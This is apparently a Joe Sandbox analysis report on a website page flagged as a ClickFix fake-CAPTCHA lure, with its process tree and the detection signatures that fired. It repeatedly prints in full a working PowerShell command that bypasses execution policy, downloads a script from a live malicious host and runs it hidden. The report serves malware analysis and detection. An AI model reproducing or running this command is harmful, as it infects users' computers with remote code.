Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.elevate.inc/our-story

Overview

General Information

Sample URL:https://www.elevate.inc/our-story
Analysis ID:1708553
Infos:

Detection

CAPTCHA Scam ClickFix
Score:100
Range:0 - 100
Confidence:100%

Signatures

Detect drive by download via clipboard copy & paste
Sigma detected: Powershell download and execute file
Suricata IDS alerts for network traffic
Yara detected CAPTCHA Scam ClickFix
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
HTML page adds supicious text to clipboard
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTML page contains hidden javascript code
HTML title does not match URL
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 6996 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6264 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1864,i,9471181850235486042,10300577009420113889,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2212 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 4596 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.elevate.inc/our-story" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • powershell.exe (PID: 1124 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l=\'https://coreun.com/wp-content/d5\';$p=Join-Path $env:TEMP \'x.js\';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList \'//nologo\',$p -WindowStyle Hidden}catch{}" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 5088 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 1688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1444 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -w hidden -c "=\'https://coreun.com/wp-content/d5\';=Join-Path C:\Users\user\AppData\Local\Temp \'x.js\';try{(New-Object Net.WebClient).DownloadFile(,);Start-Process wscript -ArgumentList \'//nologo\', -WindowStyle Hidden}catch{}" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

AI Reasoning

No reasoning have been found

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
dropped/chromecache_240JoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
    dropped/chromecache_240JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      C:\Users\user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txtJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        \Device\ConDrvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

          HTML

          SourceRuleDescriptionAuthorStrings
          0.12.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
            0.15.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
              0.8.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security

                Other

                SourceRuleDescriptionAuthorStrings
                amsi64_1124.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                  amsi64_5088.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Script Interpreter Execution From Suspicious Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -w hidden -c "=\'https://coreun.com/wp-content/d5\';=Join-Path C:\Users\user\AppData\Local\Temp \'x.js\';try{(New-Object Net.WebClient).DownloadFile(,);Start-Process wscript -ArgumentList \'//nologo\', -WindowStyle Hidden}catch{}", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -w hidden -c "=\'https://coreun.com/wp-content/d5\';=Join-Path C:\Users\user\AppData\Local\Temp \'x.js\';try{(New-Object Net.WebClient).DownloadFile(,);Start-Process wscript -ArgumentList \'//nologo\', -WindowStyle Hidden}catch{}", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5088, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -w hidden -c "=\'https://coreun.com/wp-content/d5\';=Join-Path C:\Users\user\AppData\Local\Temp \'x.js\';try{(New-Object Net.WebClient).DownloadFile(,);Start-Process wscript -ArgumentList \'//nologo\', -WindowStyle Hidden}catch{}", ProcessId: 1444, ProcessName: powershell.exe
                    Sigma detected: Suspicious PowerShell Parameter Substring
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l=\'https://coreun.com/wp-content/d5\';$p=Join-Path $env:TEMP \'x.js\';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList \'//nologo\',$p -WindowStyle Hidden}catch{}", CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l=\'https://coreun.com/wp-content/d5\';$p=Join-Path $env:TEMP \'x.js\';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList \'//nologo\',$p -WindowStyle Hidden}catch{}", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4100, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l=\'https://coreun.com/wp-content/d5\';$p=Join-Path $env:TEMP \'x.js\';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList \'//nologo\',$p -WindowStyle Hidden}catch{}", ProcessId: 1124, ProcessName: powershell.exe
                    Sigma detected: Suspicious Script Execution From Temp Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -w hidden -c "=\'https://coreun.com/wp-content/d5\';=Join-Path C:\Users\user\AppData\Local\Temp \'x.js\';try{(New-Object Net.WebClient).DownloadFile(,);Start-Process wscript -ArgumentList \'//nologo\', -WindowStyle Hidden}catch{}", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -w hidden -c "=\'https://coreun.com/wp-content/d5\';=Join-Path C:\Users\user\AppData\Local\Temp \'x.js\';try{(New-Object Net.WebClient).DownloadFile(,);Start-Process wscript -ArgumentList \'//nologo\', -WindowStyle Hidden}catch{}", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5088, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -w hidden -c "=\'https://coreun.com/wp-content/d5\';=Join-Path C:\Users\user\AppData\Local\Temp \'x.js\';try{(New-Object Net.WebClient).DownloadFile(,);Start-Process wscript -ArgumentList \'//nologo\', -WindowStyle Hidden}catch{}", ProcessId: 1444, ProcessName: powershell.exe
                    Sigma detected: Change PowerShell Policies to an Insecure Level
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l=\'https://coreun.com/wp-content/d5\';$p=Join-Path $env:TEMP \'x.js\';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList \'//nologo\',$p -WindowStyle Hidden}catch{}", CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l=\'https://coreun.com/wp-content/d5\';$p=Join-Path $env:TEMP \'x.js\';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList \'//nologo\',$p -WindowStyle Hidden}catch{}", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4100, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l=\'https://coreun.com/wp-content/d5\';$p=Join-Path $env:TEMP \'x.js\';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList \'//nologo\',$p -WindowStyle Hidden}catch{}", ProcessId: 1124, ProcessName: powershell.exe
                    Sigma detected: PowerShell Download Pattern
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l=\'https://coreun.com/wp-content/d5\';$p=Join-Path $env:TEMP \'x.js\';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList \'//nologo\',$p -WindowStyle Hidden}catch{}", CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l=\'https://coreun.com/wp-content/d5\';$p=Join-Path $env:TEMP \'x.js\';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList \'//nologo\',$p -WindowStyle Hidden}catch{}", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4100, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l=\'https://coreun.com/wp-content/d5\';$p=Join-Path $env:TEMP \'x.js\';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList \'//nologo\',$p -WindowStyle Hidden}catch{}", ProcessId: 1124, ProcessName: powershell.exe
                    Sigma detected: PowerShell Web Download
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l=\'https://coreun.com/wp-content/d5\';$p=Join-Path $env:TEMP \'x.js\';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList \'//nologo\',$p -WindowStyle Hidden}catch{}", CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l=\'https://coreun.com/wp-content/d5\';$p=Join-Path $env:TEMP \'x.js\';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList \'//nologo\',$p -WindowStyle Hidden}catch{}", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4100, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l=\'https://coreun.com/wp-content/d5\';$p=Join-Path $env:TEMP \'x.js\';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList \'//nologo\',$p -WindowStyle Hidden}catch{}", ProcessId: 1124, ProcessName: powershell.exe
                    Sigma detected: Usage Of Web Request Commands And Cmdlets
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l=\'https://coreun.com/wp-content/d5\';$p=Join-Path $env:TEMP \'x.js\';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList \'//nologo\',$p -WindowStyle Hidden}catch{}", CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l=\'https://coreun.com/wp-content/d5\';$p=Join-Path $env:TEMP \'x.js\';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList \'//nologo\',$p -WindowStyle Hidden}catch{}", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4100, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l=\'https://coreun.com/wp-content/d5\';$p=Join-Path $env:TEMP \'x.js\';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList \'//nologo\',$p -WindowStyle Hidden}catch{}", ProcessId: 1124, ProcessName: powershell.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l=\'https://coreun.com/wp-content/d5\';$p=Join-Path $env:TEMP \'x.js\';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList \'//nologo\',$p -WindowStyle Hidden}catch{}", CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l=\'https://coreun.com/wp-content/d5\';$p=Join-Path $env:TEMP \'x.js\';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList \'//nologo\',$p -WindowStyle Hidden}catch{}", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4100, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l=\'https://coreun.com/wp-content/d5\';$p=Join-Path $env:TEMP \'x.js\';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList \'//nologo\',$p -WindowStyle Hidden}catch{}", ProcessId: 1124, ProcessName: powershell.exe

                    Data Obfuscation

                    barindex
                    Sigma detected: Powershell download and execute file
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l=\'https://coreun.com/wp-content/d5\';$p=Join-Path $env:TEMP \'x.js\';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList \'//nologo\',$p -WindowStyle Hidden}catch{}", CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l=\'https://coreun.com/wp-content/d5\';$p=Join-Path $env:TEMP \'x.js\';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList \'//nologo\',$p -WindowStyle Hidden}catch{}", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4100, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l=\'https://coreun.com/wp-content/d5\';$p=Join-Path $env:TEMP \'x.js\';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList \'//nologo\',$p -WindowStyle Hidden}catch{}", ProcessId: 1124, ProcessName: powershell.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-06-06T22:19:12.652023+020020584731A Network Trojan was detected167.172.78.216443192.168.2.1649730TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    Phishing

                    barindex
                    Yara detected CAPTCHA Scam ClickFix
                    Source: Yara matchFile source: 0.12.pages.csv, type: HTML
                    Source: Yara matchFile source: 0.15.pages.csv, type: HTML
                    Source: Yara matchFile source: 0.8.pages.csv, type: HTML
                    Source: Yara matchFile source: dropped/chromecache_240, type: DROPPED
                    Source: https://www.elevate.inc/our-storyHTTP Parser: Base64 decoded: {"alg":"HS256","typ":"JWT"}
                    Source: https://www.elevate.inc/our-storyHTTP Parser: Title: Trailblazing a better future for benefits | Our Story does not match URL
                    Source: https://www.elevate.inc/our-storyHTTP Parser: Iframe src: //cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fplayer.vimeo.com%2Fvideo%2F901646435%3Fapp_id%3D122963&dntp=1&display_name=Vimeo&url=https%3A%2F%2Fplayer.vimeo.com%2Fvideo%2F901646435&image=https%3A%2F%2Fi.vimeocdn.com%2Fvideo%2F1780645815-06152f51d9ac0a046994d9ba4942d0d82fa2fe1ace9ea600abb9f1075c607855-d_1280&key=c4e54deccf4d4ec997a64902e9a30300&type=text%2Fhtml&schema=vimeo
                    Source: https://www.elevate.inc/our-storyHTTP Parser: Iframe src: https://reefe.com.au/ab/elevateinc/check/index.html
                    Source: https://www.elevate.inc/our-storyHTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/11308007612?random=1749241150624&cv=11&fst=1749241150624&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436z89174023338za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&label=GC8HCKaWkqIZELyBipAq&hn=www.googleadservices.com&frm=0&tiba=Trailblazing%20a%20better%20future%20for%20benefits%20%7C%20Our%20Story&npa=0&pscdl=noapi&auid=1637307519.1749241150&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&_tu=Cg
                    Source: https://www.elevate.inc/our-storyHTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/11308007612?random=1749241151096&cv=11&fst=1749241151096&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&hn=www.googleadservices.com&frm=0&tiba=Trailblazing%20a%20better%20future%20for%20benefits%20%7C%20Our%20Story&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=1637307519.1749241150&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
                    Source: https://www.elevate.inc/our-storyHTTP Parser: Iframe src: //cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fplayer.vimeo.com%2Fvideo%2F901646435%3Fapp_id%3D122963&dntp=1&display_name=Vimeo&url=https%3A%2F%2Fplayer.vimeo.com%2Fvideo%2F901646435&image=https%3A%2F%2Fi.vimeocdn.com%2Fvideo%2F1780645815-06152f51d9ac0a046994d9ba4942d0d82fa2fe1ace9ea600abb9f1075c607855-d_1280&key=c4e54deccf4d4ec997a64902e9a30300&type=text%2Fhtml&schema=vimeo
                    Source: https://www.elevate.inc/our-storyHTTP Parser: Iframe src: https://reefe.com.au/ab/elevateinc/check/index.html
                    Source: https://www.elevate.inc/our-storyHTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/11308007612?random=1749241150624&cv=11&fst=1749241150624&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436z89174023338za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&label=GC8HCKaWkqIZELyBipAq&hn=www.googleadservices.com&frm=0&tiba=Trailblazing%20a%20better%20future%20for%20benefits%20%7C%20Our%20Story&npa=0&pscdl=noapi&auid=1637307519.1749241150&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&_tu=Cg
                    Source: https://www.elevate.inc/our-storyHTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/11308007612?random=1749241151096&cv=11&fst=1749241151096&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&hn=www.googleadservices.com&frm=0&tiba=Trailblazing%20a%20better%20future%20for%20benefits%20%7C%20Our%20Story&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=1637307519.1749241150&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
                    Source: https://www.elevate.inc/our-storyHTTP Parser: Iframe src: //cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fplayer.vimeo.com%2Fvideo%2F901646435%3Fapp_id%3D122963&dntp=1&display_name=Vimeo&url=https%3A%2F%2Fplayer.vimeo.com%2Fvideo%2F901646435&image=https%3A%2F%2Fi.vimeocdn.com%2Fvideo%2F1780645815-06152f51d9ac0a046994d9ba4942d0d82fa2fe1ace9ea600abb9f1075c607855-d_1280&key=c4e54deccf4d4ec997a64902e9a30300&type=text%2Fhtml&schema=vimeo
                    Source: https://www.elevate.inc/our-storyHTTP Parser: Iframe src: https://reefe.com.au/ab/elevateinc/check/index.html
                    Source: https://www.elevate.inc/our-storyHTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/11308007612?random=1749241150624&cv=11&fst=1749241150624&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436z89174023338za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&label=GC8HCKaWkqIZELyBipAq&hn=www.googleadservices.com&frm=0&tiba=Trailblazing%20a%20better%20future%20for%20benefits%20%7C%20Our%20Story&npa=0&pscdl=noapi&auid=1637307519.1749241150&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&_tu=Cg
                    Source: https://www.elevate.inc/our-storyHTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/11308007612?random=1749241151096&cv=11&fst=1749241151096&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&hn=www.googleadservices.com&frm=0&tiba=Trailblazing%20a%20better%20future%20for%20benefits%20%7C%20Our%20Story&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=1637307519.1749241150&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
                    Source: https://www.elevate.inc/our-storyHTTP Parser: No favicon
                    Source: https://www.elevate.inc/our-storyHTTP Parser: No favicon
                    Source: https://www.elevate.inc/our-storyHTTP Parser: No favicon
                    Source: https://www.elevate.inc/our-storyHTTP Parser: No favicon
                    Source: https://www.elevate.inc/our-storyHTTP Parser: No favicon
                    Source: https://www.elevate.inc/our-storyHTTP Parser: No favicon
                    Source: https://www.elevate.inc/our-storyHTTP Parser: No favicon
                    Source: https://www.elevate.inc/our-storyHTTP Parser: No favicon
                    Source: https://www.elevate.inc/our-storyHTTP Parser: No favicon
                    Source: https://www.elevate.inc/our-storyHTTP Parser: No <meta name="author".. found
                    Source: https://www.elevate.inc/our-storyHTTP Parser: No <meta name="author".. found
                    Source: https://www.elevate.inc/our-storyHTTP Parser: No <meta name="author".. found
                    Source: https://www.elevate.inc/our-storyHTTP Parser: No <meta name="copyright".. found
                    Source: https://www.elevate.inc/our-storyHTTP Parser: No <meta name="copyright".. found
                    Source: https://www.elevate.inc/our-storyHTTP Parser: No <meta name="copyright".. found
                    Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49773 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49789 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.189.173.27:443 -> 192.168.2.16:49790 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49791 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 13.107.6.254:443 -> 192.168.2.16:49792 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 13.107.136.254:443 -> 192.168.2.16:49793 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49794 version: TLS 1.2
                    Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 0000000F.00000002.1611645953.0000015DA162C000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.pdbF source: powershell.exe, 0000000F.00000002.1611823408.0000015DA16F5000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: ystem.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000F.00000002.1611645953.0000015DA16B2000.00000004.00000020.00020000.00000000.sdmp
